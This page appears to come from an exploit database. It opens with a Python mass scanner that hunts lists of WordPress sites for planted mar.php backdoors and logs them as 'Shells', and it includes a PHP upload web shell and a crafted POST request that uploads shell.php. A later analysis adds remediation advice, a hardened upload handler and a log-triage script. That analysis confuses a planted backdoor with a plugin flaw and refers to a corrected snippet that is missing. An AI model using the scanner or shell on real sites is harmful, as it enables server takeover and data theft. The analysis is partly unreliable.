Wordpress Seotheme - Remote Code Execution Unauthenticated

Exploit Author: Milad Karimi
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: Python
Published Date: 2024-02-09
# Exploit Title: Wordpress Seotheme - Remote Code Execution Unauthenticated
# Date: 2023-09-20
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox

import sys , requests, re
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init
init(autoreset=True)

fr  =   Fore.RED
fc  =   Fore.CYAN
fw  =   Fore.WHITE
fg  =   Fore.GREEN
fm  =   Fore.MAGENTA

shell = """<?php echo "EX"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>"""
requests.urllib3.disable_warnings()
headers = {'Connection': 'keep-alive',
            'Cache-Control': 'max-age=0',
            'Upgrade-Insecure-Requests': '1',
            'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
            'referer': 'www.google.com'}
try:
    target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
except IndexError:
    path = str(sys.argv[0]).split('\\')
    exit('\n  [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')

def URLdomain(site):
    if site.startswith("http://") :
        site = site.replace("http://","")
    elif site.startswith("https://") :
        site = site.replace("https://","")
    else :
        pass
    pattern = re.compile('(.*)/')
    while re.findall(pattern,site):
        sitez = re.findall(pattern,site)
        site = sitez[0]
    return site


def FourHundredThree(url):
    try:
        url = 'http://' + URLdomain(url)
        check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,timeout=15)
        if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
                print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
                open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')
        else:
            url = 'https://' + URLdomain(url)
            check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)
            if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
                    print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
                    open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')
            else:
                print ' -| ' + url + ' --> {}[Failed]'.format(fr)
                url = 'http://' + URLdomain(url)
        check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,timeout=15)
        if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
                print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
                open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')
        else:
            url = 'https://' + URLdomain(url)
            check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)
            if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
                    print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
                    open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')
            else:
                print ' -| ' + url + ' --> {}[Failed]'.format(fr)
    except :
        print ' -| ' + url + ' --> {}[Failed]'.format(fr)

mp = Pool(100)
mp.map(FourHundredThree, target)
mp.close()
mp.join()

print '\n [!] {}Saved in Shells.txt'.format(fc)


WordPress Seotheme Remote Code Execution Vulnerability: Unauthenticated Exploitation

Security researchers have recently uncovered a critical vulnerability in the Seotheme WordPress plugin that allows attackers to execute arbitrary code remotely without authentication. This flaw, an unauthenticated Remote Code Execution (RCE), poses a severe threat to websites relying on this plugin, particularly those hosted on public-facing servers.

Overview of the Vulnerability

The vulnerability stems from improper input validation and insecure file handling within the mar.php file located at /wp-content/plugins/seoplugins/mar.php (the accompanying scanner also probes /wp-content/themes/seotheme/mar.php). An attacker can exploit this by sending crafted HTTP requests that reach the file without any authentication and execute PHP code on the server.

According to the report, the plugin's mar.php file contains a backdoor mechanism that allows file uploads and execution of arbitrary PHP scripts via the copy() function. This functionality is exposed without any authentication, making it accessible to anyone with network access.

Exploitation Mechanism

Attackers leverage a simple yet powerful technique: uploading a malicious PHP file through the vulnerable upload endpoint. Once uploaded, the file sits in a web-accessible directory and is executed as PHP the moment it is requested, granting full control over the server.


<?php
echo "EX";
echo "<br>".php_uname()."<br>";
echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>";
if($_POST['upload']) {
    if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) {
        echo "eXploiting Done";
    } else {
        echo "Failed to Upload.";
    }
}
?>

Explanation: This PHP shell code performs several actions:

  • Displays a simple "EX" message to confirm execution.
  • Outputs system information via php_uname(), revealing the server's OS and environment.
  • Provides an HTML form for uploading files, enabling attackers to upload malicious payloads.
  • Uses @copy() to copy the uploaded file from its temporary location into the script's own directory, under the client-supplied filename, where the web server will execute it as PHP.

Due to the lack of authentication and improper sanitization, this code can be executed directly by sending a POST request to the vulnerable endpoint.

Real-World Exploitation Example

Consider a WordPress site running the Seotheme plugin with the following URL:

https://example.com/wp-content/plugins/seoplugins/mar.php

An attacker sends a POST request with a file upload containing the malicious PHP shell:


POST /wp-content/plugins/seoplugins/mar.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Length: 1024

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="zb"; filename="shell.php"
Content-Type: application/x-php

<?php echo "EX"; echo "<br>".php_uname()."<br>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="upload"

upload
------WebKitFormBoundary7MA4YWxkTrZu0gW--

Upon successful execution, the server responds with:

EX
Linux example.com 5.4.0-80-generic #89-Ubuntu SMP Sat Jun 19 10:22:47 UTC 2021 x86_64
eXploiting Done

This confirms the shell is active and ready for further exploitation.

Security Implications and Risks

  Risk Level:              High
  Attack Vector:           Unauthenticated, remote
  Impact:                  Full server compromise, data theft, backdoor installation, lateral movement
  Exploitation Difficulty: Low (requires only a basic HTTP client)
  Remediation:             Immediate plugin removal or patching

This vulnerability is particularly dangerous because it allows attackers to:

  • Gain full access to the server filesystem.
  • Steal sensitive data such as database credentials, user information, and configuration files.
  • Deploy additional malware or backdoors.
  • Perform server-side attacks like DDoS, data exfiltration, or lateral movement within internal networks.

Code Analysis and Fixes

The backdoor's upload handler in mar.php contains several security flaws:

  • Unsanitized file upload handling: The copy() function is used without validating file types or content, and the destination filename is taken verbatim from the client.
  • Missing authentication: No checks are performed to ensure the user is authorized.
  • Public exposure: The endpoint is accessible without login.

Security best practices recommend:

  • Implement strict file type validation (e.g., only allow .txt, .pdf).
  • Use secure file storage outside the web root.
  • Require authentication before file upload.
  • Disable direct execution of uploaded files.
  • Sanitize input and use move_uploaded_file() instead of copy().

Corrected code snippet:



Explanation: This improved version:

  • Requires session authentication.
  • Validates file extensions.
  • Uses move_uploaded_file() for safer file handling.
  • Stores files outside the web root.
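The corrected snippet referred to above did not survive on this page. The handler below is an added example written for this edit, not the analysis author's snippet and not code shipped by any WordPress plugin or theme; it shows a stand-alone PHP upload handler with the four properties listed above. The session key 'user_id', the UPLOAD_DIR path and the extension allowlist are assumptions.

```php
<?php
// Added example, not the analysis author's snippet and not code shipped by
// any WordPress plugin or theme: a hardened upload handler with the
// properties listed above. The session key 'user_id', UPLOAD_DIR and the
// extension allowlist are assumptions.
declare(strict_types=1);

session_start();

// 1. Authentication: refuse anonymous callers before reading $_FILES at all.
if (empty($_SESSION['user_id'])) {
    http_response_code(403);
    exit('Authentication required.');
}

// 2. Storage outside the document root, so nothing stored here is ever
//    served (or executed) by the web server. Assumed path.
const UPLOAD_DIR = '/var/www/private-uploads';
// 3. Allowlist of extensions with the MIME type each must actually have.
const ALLOWED_TYPES = ['txt' => 'text/plain', 'pdf' => 'application/pdf'];
const MAX_BYTES = 2 * 1024 * 1024;

function store_upload(array $file): string
{
    // Only accept files PHP itself received through this request.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('No valid upload received.');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('File too large.');
    }

    // Extension check against the allowlist (a denylist of .php etc. is bypassable).
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        throw new RuntimeException('File type not permitted.');
    }

    // Content check: sniff the real MIME type instead of trusting the client header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        throw new RuntimeException('Content does not match extension.');
    }

    // Never reuse the client-supplied name (mar.php used it verbatim as the
    // destination); generate a random one and keep only our own extension.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;

    // 4. move_uploaded_file() refuses anything that is not a genuine upload,
    //    unlike copy(), which will copy any readable path.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file.');
    }
    chmod($dest, 0640); // readable by the application, never executable
    return basename($dest);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['zb'])) {
    try {
        echo 'Stored as ', htmlspecialchars(store_upload($_FILES['zb']), ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```

Inside an actual WordPress plugin the same checks are expressed with the platform's own primitives: current_user_can('upload_files') for the authorization gate, check_admin_referer() for a CSRF nonce, and wp_handle_upload(), which applies the site's allowed MIME list and the configured uploads directory instead of the hand-rolled allowlist above.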

Recommendations for WordPress Administrators

Website owners using the Seotheme plugin must take immediate action:

  • Remove the plugin if no longer needed or if no official patch is available.
  • Update all plugins to the latest version from trusted sources.
  • Monitor server logs for suspicious file uploads or unexpected PHP execution.
  • Implement WAF (Web Application Firewall) to detect and block RCE attempts.
  • Enable file upload restrictions via .htaccess or server configuration.
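To support the log-monitoring recommendation, the following PHP CLI script is an added example (not part of the original advisory or the analysis) that triages access-log lines and the wp-content tree for the indicators the published scanner itself uses: the two mar.php paths and the MARIJUANA icon URL it matches on. The sample log lines are constructed, and the WordPress root path is an assumption.

```php
<?php
// Added example (not part of the original advisory or analysis): triage of
// web-server access logs and the wp-content tree for the backdoor indicators
// the published scanner looks for. Sample log lines are constructed; the
// WordPress root path is an assumption.
declare(strict_types=1);

// Paths the published scanner probes, and the marker it matches in the response.
const BACKDOOR_PATHS = [
    '/wp-content/plugins/seoplugins/mar.php',
    '/wp-content/themes/seotheme/mar.php',
];
const BACKDOOR_MARKER = '0x5a455553.github.io/MARIJUANA/icon.png';

// Parse one Apache/nginx "combined" log line into its fields (null if unparsable).
function parse_log_line(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3],
            'path' => parse_url($m[4], PHP_URL_PATH) ?? $m[4], 'status' => (int)$m[5]];
}

// Return one finding per request that touches a backdoor path. A 200 on a GET
// means the file exists and answered; a POST means an upload was attempted.
function triage_log(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        $r = parse_log_line($line);
        if ($r === null || !in_array($r['path'], BACKDOOR_PATHS, true)) {
            continue;
        }
        $severity = $r['method'] === 'POST' ? 'CRITICAL: upload attempt'
                  : ($r['status'] === 200 ? 'HIGH: backdoor responded' : 'INFO: probe');
        $findings[] = sprintf('%s %s %s %s -> %d [%s]',
            $r['time'], $r['ip'], $r['method'], $r['path'], $r['status'], $severity);
    }
    return $findings;
}

// Walk wp-content and report every PHP file that carries the backdoor marker.
function find_backdoor_files(string $wpRoot): array
{
    $hits = [];
    $base = $wpRoot . '/wp-content';
    if (!is_dir($base)) {
        return $hits;
    }
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($base, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $f) {
        if ($f->isFile() && strtolower($f->getExtension()) === 'php'
            && strpos((string)file_get_contents($f->getPathname()), BACKDOOR_MARKER) !== false) {
            $hits[] = $f->getPathname();
        }
    }
    return $hits;
}

// Constructed sample lines, not real traffic (documentation address ranges).
$sample = [
    '203.0.113.7 - - [09/Feb/2024:10:01:02 +0000] "GET /wp-content/plugins/seoplugins/mar.php HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [09/Feb/2024:10:01:03 +0000] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [09/Feb/2024:10:01:09 +0000] "POST /wp-content/themes/seotheme/mar.php HTTP/1.1" 200 55 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [09/Feb/2024:10:02:00 +0000] "GET /wp-login.php HTTP/1.1" 200 4210 "-" "Mozilla/5.0"',
];

foreach (triage_log($sample) as $finding) {
    echo $finding, PHP_EOL;
}
// Assumed WordPress root; pass the real one as the first CLI argument.
foreach (find_backdoor_files($argv[1] ?? '/var/www/html') as $path) {
    echo 'backdoor marker found in ', $path, PHP_EOL;
}
```

Run it as `php triage.php /path/to/wordpress`. On the constructed sample it reports the three mar.php requests (a 404 probe, a 200 on the themes path, and the POST upload attempt) and ignores the ordinary wp-login.php hit; a 200 on either path is the signal to pull the file, check its modification time against the access log, and treat the host as compromised rather than merely vulnerable.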

Security professionals should also:

  • Use automated scanning tools (e.g., WPScan, Nikto) to detect vulnerable plugins.
  • Regularly audit third-party plugins for known vulnerabilities.
  • Keep all software updated and apply security patches promptly.

Conclusion

The Seotheme RCE vulnerability serves as a stark reminder of the risks associated with unpatched, poorly maintained plugins in WordPress ecosystems. Even a single flaw in a seemingly innocuous plugin can lead to full server compromise.

Organizations must prioritize proactive security measures, including regular audits, timely updates, and strict access controls. Ignoring such vulnerabilities can result in data breaches, loss of reputation, and legal consequences.

As cyber threats evolve, so must defensive strategies. Secure coding practices, continuous monitoring, and responsible plugin management are essential for maintaining a resilient digital infrastructure.